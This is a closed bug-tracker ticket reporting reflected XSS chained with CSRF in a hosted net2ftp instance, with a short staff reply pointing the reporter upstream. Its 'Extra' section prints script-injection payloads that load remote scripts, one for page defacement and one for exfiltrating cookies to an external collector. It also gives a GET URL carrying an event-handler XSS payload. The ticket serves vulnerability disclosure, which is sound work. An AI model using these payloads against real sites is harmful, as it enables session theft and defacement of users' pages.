- Status Closed
-
Assigned To
cbay - Private
Attached to Project: Security vulnerabilities
Opened by shivangmauryaa - 14.04.2025
Last edited by cbay - 14.04.2025
Opened by shivangmauryaa - 14.04.2025
Last edited by cbay - 14.04.2025
FS#153 - Reflected XSS via CSRF
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Description
A high-impact Stored/Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the url_withpw parameter of the POST request to https://net2ftp.alwaysdata.com/index.php.
Due to the absence of proper input sanitization and output encoding, it is possible to inject arbitrary JavaScript that gets executed in the context of the victim’s browser. This flaw becomes significantly more critical when chained with CSRF, as it allows a remote attacker to exploit a logged-in user's session without requiring any user interaction beyond simply visiting a malicious page.
Steps to reproduce
1. open browser visit https://net2ftp.alwaysdata.com/index.php 2. intercept request and paste below code
3. now you will see alert
Chaining with CSRf
1. make a file xss.html
2. paste the below code
3. open the file you will see alert
Extra
we can deface page via XSS as well using payload : "><script src=https://jso-tools.z-x.my.id/raw/~/D2OR7UZJICY8P></script>
and exifilirate cookies :'"><script src=https://xss.report/c/shivangmauryaa></script>
on same endpoint parameter : url_withoutpw and go_to_state
are vulnerable
here is one more XSS on same endpoint via GET request however im not adding in different report because i the endpoints are same .
https://net2ftp.alwaysdata.com/index.php?directory=/1&entry=&ftpmode=binary&ftpserver=1&ftpserverport=21&go_to_state=teste%22oncontentvisibilityautostatechange=%22alert(1)%22%20%20style=%22content-visibility:auto%22&go_to_state2=main&language=en&passivemode=1&password_encrypted=76A44335496474CB960FA0F2BBD5F54B&protocol=FTP&skin=shinra&sort=&sortorder=&sshfingerprint=1&state=login_small&state2=bookmark&username=pHqghUme&viewmode=list
endpoint url_withoutpw is vulnerable same as the above CSRF
Hello,
We run the latest net2ftp version. If you've found a vulnerability in net2ftp, you should report it to them.
Kind regards,
Cyril